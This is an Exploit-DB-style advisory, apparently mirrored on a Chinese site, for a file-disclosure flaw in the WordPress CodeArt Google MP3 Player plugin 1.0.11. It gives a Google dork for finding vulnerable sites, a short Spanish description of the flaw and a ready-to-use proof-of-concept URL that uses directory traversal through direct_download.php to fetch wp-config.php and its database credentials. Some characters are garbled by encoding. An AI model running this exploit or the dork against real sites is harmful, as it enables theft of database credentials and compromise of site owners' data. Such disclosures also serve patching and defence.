WordPress Plugin CodeArt Google MP3 Player – File Disclosure Download - 体验盒子

作者： QK14 Team

日期： 2014-12-03

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/35460/

# Exploit Title: WordPress CodeArt Google MP3 Player plugin - File
Disclosure Download

# Google Dork:
inurl:/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=

# Date: 02/12/2014

# Exploit Author: QK14 Team

# Vendor Homepage: https://wordpress.org/plugins/google-mp3-audio-player/

# Software Link: https://wordpress.org/plugins/google-mp3-audio-player/

# Version: 1.0.11

# http://wordpressa.quantika14.com/repository/index.php?id=14

 

Descripci�n:

 

Este plugin es vulnerable a File Disclosure Download.

Gracias a esta vulnerabilidad, un usuario podr� descargar el archivo de
configuraci�n config.php y extraer de �l los datos de acceso a la Base de
Datos.

 

POF:

localhost/wordpress/wp-content/plugins/google-mp3-audio-player/direct_downlo
ad.php?file=../../../wp-config.php